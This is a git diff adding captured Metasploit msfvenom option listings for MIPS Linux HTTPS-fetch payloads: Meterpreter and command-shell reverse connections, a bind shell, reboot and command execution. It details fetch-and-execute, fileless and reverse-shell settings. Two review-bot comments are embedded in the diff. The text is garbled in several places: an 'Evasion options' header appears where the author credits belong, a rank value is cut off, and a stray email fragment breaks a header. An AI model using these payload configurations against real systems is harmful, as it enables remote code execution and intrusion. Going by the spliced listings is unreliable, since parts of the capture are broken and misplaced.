AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A 
string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..e5e7cea --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter_reverse_tcp.txt 
@@ -0,0 +1,103 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/mipsbe/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/mipsbe/meterpreter_reverse_tcp: +========================= + +ook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME VsloLaaJECI no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + 
MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsbe-reboot.txt b/msfvenom/payload_options/cmd-linux-https-mipsbe-reboot.txt new file mode 100644 index 0000000..2dd85ac --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsbe-reboot.txt 
@@ -0,0 +1,74 @@ + + Name: HTTPS Fetch, Linux Reboot + Module: payload/cmd/linux/https/mipsbe/reboot + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + rigan - + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME MNZWdrUwKrc no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTPS server. + + A very small shellcode for rebooting the system. + This payload is sometimes helpful for testing purposes or executing + other payloads that rely on initial startup procedures. 
+ + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsbe-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-mipsbe-shell-reverse_tcp.txt new file mode 100644 index 0000000..8a6b61f --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-https-mipsbe-shell-reverse_tcp.txt 
@@ -0,0 +1,96 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/https/mipsbe/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME sUxQlkTkc no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTPS server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no 
A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsbe-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-mipsbe-shell_bind_tcp.txt new file mode 100644 index 0000000..47767fe --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsbe-shell_bind_tcp.txt 
@@ -0,0 +1,79 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/https/mipsbe/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + scut + vaicebine + Vlatko Kosturjak + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME sjloBsPw no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTPS server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-linux-https-mipsbe-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-mipsbe-shell_reverse_tcp.txt new file mode 100644 index 0000000..3f4cf39 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsbe-shell_reverse_tcp.txt 
@@ -0,0 +1,84 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/https/mipsbe/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + rigan + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME NsAXOzpGajXa no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTPS server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsle-exec.txt b/msfvenom/payload_options/cmd-linux-https-mipsle-exec.txt new file mode 100644 index 0000000..3009d3f --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsle-exec.txt 
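Review bot: The advanced-options table in this hunk (the block beginning "Name Current Setting Required Description" after the Description paragraph) has lost its section title, so it reads as an unlabeled continuation of the basic options; the capture should keep the "... options for payload/...:" title line that msfvenom prints above each table. Two smaller points come from the module's own option strings rather than this file: the FETCH_FILELESS description has an unbalanced parenthesis ("(for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)" never closes the first one), and "an MIPSBE payload" should read "a MIPSBE payload"; those fixes belong upstream. Finally, FETCH_FILENAME ("NsAXOzpGajXa") is a per-run random default, so every regeneration of this file will produce a spurious diff; consider having the generation script normalize that column to a fixed placeholder.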
@@ -0,0 +1,75 @@ + + Name: HTTPS Fetch, Linux Execute Command + Module: payload/cmd/linux/https/mipsle/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + entropy + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ahLQgwLq no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + + A very small shellcode for executing commands. + This module is sometimes helpful for testing purposes as well as + on targets with extremely limited buffer space. 
+ + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..a475375 --- /dev/null 
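Review bot: Same missing title on the advanced-options table after the Description paragraph as in the previous file. Also worth a clarifying line somewhere these files are consumed: "Total size: 104" with "Arch: cmd" is the length of the fetch command string, not of the MIPSLE shellcode it downloads, whereas the Description text carried over from the exec module ("A very small shellcode ... extremely limited buffer space") refers to the latter, so the two figures are easy to conflate when reading this file on its own. FETCH_FILENAME ("ahLQgwLq") is again a randomized default that will churn on regeneration.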
+++ b/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter-reverse_tcp.txt 
@@ -0,0 +1,105 @@ + + Name: HTTPS Fetch, Reverse TCP Stager + Module: payload/cmd/linux/https/mipsle/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Norm +Evasion options for payload/cmd/linux/https/mipsle/meterpreter/reverse_tcp: +========================= + + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME JeVONKbzGYE no Name to use on remote system when 